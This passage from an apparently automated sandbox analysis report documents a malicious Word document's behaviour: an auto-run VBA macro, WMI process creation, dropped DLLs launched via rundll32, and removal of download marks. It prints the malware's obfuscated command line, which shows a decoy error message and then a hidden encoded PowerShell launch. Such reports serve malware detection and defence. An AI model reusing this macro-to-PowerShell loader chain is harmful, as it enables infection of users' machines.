Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_00224C27 11_2_00224C27
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_0023502C 11_2_0023502C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_0022542D 11_2_0022542D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_0023C83F 11_2_0023C83F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_0022923C 11_2_0022923C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_00233C07 11_2_00233C07
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_00228217 11_2_00228217
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_0023C014 11_2_0023C014
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_0022BC63 11_2_0022BC63
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_00228A60 11_2_00228A60
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_0022C652 11_2_0022C652
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_00233856 11_2_00233856
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_00229055 11_2_00229055
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_0023D45C 11_2_0023D45C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_002216B2 11_2_002216B2
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_0022C0B6 11_2_0022C0B6
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_002310BB 11_2_002310BB
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_002360B9 11_2_002360B9
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_0022C485 11_2_0022C485
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_00234689 11_2_00234689
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_0023188F 11_2_0023188F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_0023B499 11_2_0023B499
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_0023D099 11_2_0023D099
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_00223E9E 11_2_00223E9E
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_002304E1 11_2_002304E1
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_002310E5 11_2_002310E5
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_00236AE4 11_2_00236AE4
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_0023D2EC 11_2_0023D2EC
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_002372F1 11_2_002372F1
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_002332F0 11_2_002332F0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_00235AC3 11_2_00235AC3
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_002232C2 11_2_002232C2
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_00231ED9 11_2_00231ED9
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_002384D9 11_2_002384D9
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_00235CDF 11_2_00235CDF
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_0023E32D 11_2_0023E32D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_00226134 11_2_00226134
Document contains an embedded VBA macro which executes code when the document is opened / closed
Source: ARCH_25_012021.doc OLE, VBA macro line: Private Sub Document_open()
Source: VBA code instrumentation OLE, VBA macro: Module A5ate73kc6cw5njy, Function Document_open Name: Document_open
Document contains embedded VBA macros
Source: ARCH_25_012021.doc OLE indicator, VBA macros: true
Dropped file seen in connection with other malware
Source: Joe Sandbox View Dropped File: C:\Users\user\Kaktksw\An6othh\N49I.dll D09BACE1490F6EE322262FF2DA373E861F3B3B9BC03C386CE8A031648F1EAA4F
PE file contains strange resources
Source: N49I.dll.5.dr Static PE information: Resource name: RT_BITMAP type: GLS_BINARY_LSB_FIRST
Source: rundll32.exe, 00000006.00000002.2102931127.0000000001CF0000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2100205585.00000000007E0000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2102534747.00000000021C0000.00000002.00000001.sdmp, rundll32.exe, 00000009.00000002.2106073244.00000000021D0000.00000002.00000001.sdmp Binary or memory string: .VBPud<_
Source: classification engine Classification label: mal100.troj.evad.winDOC@24/8@1/98
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_007434DF CreateToolhelp32Snapshot, 14_2_007434DF
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File created: C:\Users\user\Desktop\~$CH_25_012021.doc
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Mutant created: \Sessions\1\BaseNamedObjects\Global\.net clr networking
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File created: C:\Users\user\AppData\Local\Temp\CVRC503.tmp
Source: ARCH_25_012021.doc OLE indicator, Word Document stream: true
Source: ARCH_25_012021.doc OLE document summary: edited time not present or 0
Source: C:\Windows\System32\msg.exe Console Write: ..%..................................... .........................(.....8.(.............#.........................%.....h.......5kU.......(.....
Source: C:\Windows\System32\msg.exe Console Write: ................T...............A.s.y.n.c. .m.e.s.s.a.g.e. .s.e.n.t. .t.o. .s.e.s.s.i.o.n. .C.o.n.s.o.l.e.......x.(.....L.................(.....
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ........................................................................`I.........v.....................K......x.].............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ..%.............y=.v.......................j......................u.............}..v....P3......0.................%.............T...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.......................j..... u...............u.............}..v.....3......0...............x.].............T...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ..%.............y=.v....................#..j......................u.............}..v.....@......0.................%.............T...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....................#..j....X.]...............u.............}..v....@A......0.................].............T...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ..%.............y=.v....#...............s..j......................u.............}..v.....w......0.................%.............T...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....#...............s..j..... u...............u.............}..v.....x......0...............(.].............T...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ..%.............y=.v....7................/.j....@I]...............u.............}..v............0.................%.............T...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....7................/.j......................u.............}..v....(.......0................F].............T...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ..%.............y=.v....C................/.j....@I]...............u.............}..v............0.................%.............T...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....C................/.j......................u.............}..v....(.......0................F].............T...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ..%.............y=.v....O................/.j....@I]...............u.............}..v............0.................%.............T...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....O................/.j......................u.............}..v....(.......0................F].............T...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....[.......e.s. .a.r.e. .".S.s.l.3.,. .T.l.s."...".........}..v....@.......0................E].....(.......T...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....[................/.j......................u.............}..v....x.......0................F].............T...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....g.......A.t. .l.i.n.e.:.1. .c.h.a.r.:.4.6.2.............}..v............0................E].....$.......T...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....g................/.j....@.................u.............}..v............0................F].............T...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ..%.............y=.v....s................/.j....@I]...............u.............}..v............0.................%.............T...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....s................/.j....@.................u.............}..v............0................F].............T...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ..%.............y=.v...................../.j....@I]...............u.............}..v............0.................%.............T...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v...................../.j....@.................u.............}..v............0................F].............T...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ..%.............y=.v...................../.j....@I]...............u.............}..v............0.................%.............T...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v...................../.j....@.................u.............}..v............0................F].............T...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ..%.............y=.v...................../.j....@I]...............u.............}..v............0.................%.............T...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v...................../.j....@.................u.............}..v............0................F].............T...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ..%.............y=.v...................../.j....@I]...............u.............}..v............0.................%.............T...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v...................../.j....@.................u.............}..v............0................F].............T...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ..%.............y=.v...................../.j....@I]...............u.............}..v............0.................%.............T...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v...................../.j....@.................u.............}..v............0................F].............T...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ..%.............y=.v...................../.j....@I]...............u.............}..v............0.................%.............T...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v...................../.j....@.................u.............}..v............0................F].............T...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ..%.............y=.v...................../.j....@I]...............u.............}..v............0.................%.............T...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v...................../.j....@.................u.............}..v............0................F].............T...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ..%.............y=.v...................../.j....@I]...............u.............}..v............0.................%.............T...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v...................../.j....@.................u.............}..v............0................F].............T...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ..%.............y=.v...................../.j....@I]...............u.............}..v............0.................%.............T...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v...................../.j....@.................u.............}..v............0................F].............T...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ..%.............y=.v...................../.j....@I]...............u.............}..v.....%......0.................%.............T...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v...................../.j....@&................u.............}..v.....&......0................F].............T...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ..%.............y=.v...................../.j....@I]...............u.............}..v.....-......0.................%.............T...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v...................../.j....@.................u.............}..v............0................F].............T...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ..%.............y=.v...................../.j....@I]...............u.............}..v.....5......0.................%.............T...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v...................../.j....@6................u.............}..v.....6......0................F].............T...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ..%.............y=.v...................../.j....@I]...............u.............}..v.....=......0.................%.............T...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v...................../.j....@>................u.............}..v.....>......0................F].............T...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ..%.............y=.v...................../.j....@I]...............u.............}..v.....E......0.................%.............T...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v...................../.j....@F................u.............}..v.....F......0................F].............T...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ..%.............y=.v....'................/.j....@I]...............u.............}..v.....M......0.................%.............T...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....'................/.j....@N................u.............}..v.....N......0................F].............T...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ..%.............y=.v....3................/.j....@I]...............u.............}..v.....U......0.................%.............T...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....3................/.j....@V................u.............}..v.....V......0................F].............T...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ..%.............y=.v....?................/.j....@I]...............u.............}..v.....]......0.................%.............T...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....?................/.j....@^................u.............}..v.....^......0................F].............T...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ..%.............y=.v....K................/.j....@I]...............u.............}..v.....e......0.................%.............T...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....K................/.j....@f................u.............}..v.....f......0................F].............T...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ..%.............y=.v....W................/.j....@I]...............u.............}..v.....m......0.................%.............T...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....W................/.j....@n................u.............}..v.....n......0................F].............T...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ..%.............y=.v....c................/.j....@I]...............u.............}..v.....u......0.................%.............T...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....c................/.j....@v................u.............}..v.....v......0................F].............T...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ..%.............y=.v....o................/.j....@I]...............u.............}..v.....}......0.................%.............T...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....o................/.j....@~................u.............}..v.....~......0................F].............T...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ..%.............y=.v....{................/.j....@I]...............u.............}..v............0.................%.............T...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....{................/.j....@.................u.............}..v............0................F].............T...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ..%.............y=.v...................../.j....@I]...............u.............}..v............0.................%.............T...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v...................../.j....@.................u.............}..v............0................F].............T............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ..%.............y=.v...................../.j....@I]...............u.............}..v............0.................%.............T............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v...................../.j....@.................u.............}..v............0................F].............T............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ..%.............y=.v...................../.j....@I]...............u.............}..v............0.................%.............T............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v...................../.j....@.................u.............}..v............0................F].............T............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v............Y.'.).}.}.c.a.t.c.h.{.}.}.$.B.5.8.I.=.(.'.O.3.'.+.'.5.I.'.).....0................E].....<.......T............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v...................../.j......................u.............}..v....8.......0................F].............T............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ..%.............y=.v...................../.j....@I]...............u.............}..v............0.................%.............T............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v...................../.j......................u.............}..v............0................F].............T............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ..%.............y=.v...................../.j....@I]...............u.............}..v....h.......0.................%.....r.......T............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v...................../.j.... .................u.............}..v............0................F].............T............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v............ ......../.j....@I]...............u.............}..v....0.......0................E].............T............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v...................../.j......................u.............}..v....h.......0................F].............T............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.......................j....E.................u.............}..v............0...............X.].............T............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.......................j....E.................u.............}..v....x4......0...............X.].............T............... Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\NativeImages_v2.0.50727_64\mscorlib\fe6ac93181b40a571892e14bfb9d65f2\mscorlib.ni.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE WMI Queries: IWbemServices::ExecMethod - Win32_Process::Create
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File read: C:\Users\desktop.ini
Source: C:\Windows\System32\msg.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\SysWOW64\rundll32.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: unknown Process created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\Kaktksw\An6othh\N49I.dll AnyString
Source: ARCH_25_012021.doc Virustotal: Detection: 57%
Source: ARCH_25_012021.doc ReversingLabs: Detection: 26%
Source: unknown Process created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding
Source: unknown Process created: C:\Windows\System32\cmd.exe cmd cmd /c m^s^g %username% /v Wo^rd exp^erien^ced an er^ror tryi^ng to op^en th^e fi^le. & p^owe^rs^he^ll^ -w hi^dd^en -^e^nc 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
Source: unknown Process created: C:\Windows\System32\msg.exe msg user /v Word experienced an error trying to open the file.
Source: unknown Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w hidden -enc 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
Source: unknown Process created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\Kaktksw\An6othh\N49I.dll AnyString
Source: unknown Process created: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\Kaktksw\An6othh\N49I.dll AnyString
Source: unknown Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Users\user\Kaktksw\An6othh\N49I.dll',#1
Source: unknown Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Xsugi\zrfn.shd',FIxqgRZUp
Source: unknown Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Xsugi\zrfn.shd',#1
Source: unknown Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Omuzql\aridm.cve',PiBVmMpskdW
Source: unknown Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Omuzql\aridm.cve',#1
Source: unknown Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Yjyrclfl\qwodoyj.whn',CPVO
Source: unknown Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Yjyrclfl\qwodoyj.whn',#1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\msg.exe msg user /v Word experienced an error trying to open the file.
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w hidden -enc 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
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\Kaktksw\An6othh\N49I.dll AnyString
Source: C:\Windows\System32\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\Kaktksw\An6othh\N49I.dll AnyString
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Users\user\Kaktksw\An6othh\N49I.dll',#1
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Xsugi\zrfn.shd',FIxqgRZUp
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Xsugi\zrfn.shd',#1
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Omuzql\aridm.cve',PiBVmMpskdW
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Omuzql\aridm.cve',#1
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Yjyrclfl\qwodoyj.whn',CPVO
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Yjyrclfl\qwodoyj.whn',#1
Source: C:\Windows\SysWOW64\rundll32.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{1F486A52-3CB1-48FD-8F50-B8DC300D9F9D}\InProcServer32
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\mscorrc.dll
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2098357999.0000000002737000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\symbols\dll\System.Management.Automation.pdbCom source: powershell.exe, 00000005.00000002.2098357999.0000000002737000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\dll\System.Management.Automation.pdbProg source: powershell.exe, 00000005.00000002.2098357999.0000000002737000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\assembly\GAC_MSIL\System.Management.Automation\1.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2098357999.0000000002737000.00000004.00000040.sdmp
Source: Binary string: ws\System.Management.Automation.pdbpdbion.pdbERSP source: powershell.exe, 00000005.00000002.2098357999.0000000002737000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2098357999.0000000002737000.00000004.00000040.sdmp
Source: Binary string: mscorrc.pdb source: powershell.exe, 00000005.00000002.2098362682.0000000002740000.00000002.00000001.sdmp

Data Obfuscation:

Document contains an embedded VBA with many GOTO operations indicating source code obfuscation
Source: ARCH_25_012021.doc Stream path 'Macros/VBA/Gusca95luq_' : High number of GOTO operations
Source: VBA code instrumentation OLE, VBA macro, High number of GOTO operations: Module Gusca95luq_ Name: Gusca95luq_
Obfuscated command line found
Source: unknown Process created: C:\Windows\System32\cmd.exe cmd cmd /c m^s^g %username% /v Wo^rd exp^erien^ced an er^ror tryi^ng to op^en th^e fi^le. & p^owe^rs^he^ll^ -w hi^dd^en -^e^nc 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
Suspicious powershell command line found
Source: unknown Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w hidden -enc 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
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w hidden -enc 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
Uses code obfuscation techniques (call, push, ret)

Persistence and Installation Behavior:

Creates processes via WMI
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE WMI Queries: IWbemServices::ExecMethod - Win32_Process::Create
Drops PE files
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\Kaktksw\An6othh\N49I.dll
Drops PE files to the windows directory (C:\Windows)
Source: C:\Windows\SysWOW64\rundll32.exe PE file moved: C:\Windows\SysWOW64\Xsugi\zrfn.shd

Hooking and other Techniques for Hiding and Protection:

Hides that the sample has been downloaded from the Internet (zone.identifier)
Source: C:\Windows\SysWOW64\rundll32.exe File opened: C:\Windows\SysWOW64\Xsugi\zrfn.shd:Zone.Identifier read attributes | delete Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe File opened: C:\Windows\SysWOW64\Omuzql\aridm.cve:Zone.Identifier read attributes | delete Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe File opened: C:\Windows\SysWOW64\Yjyrclfl\qwodoyj.whn:Zone.Identifier read attributes | delete Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
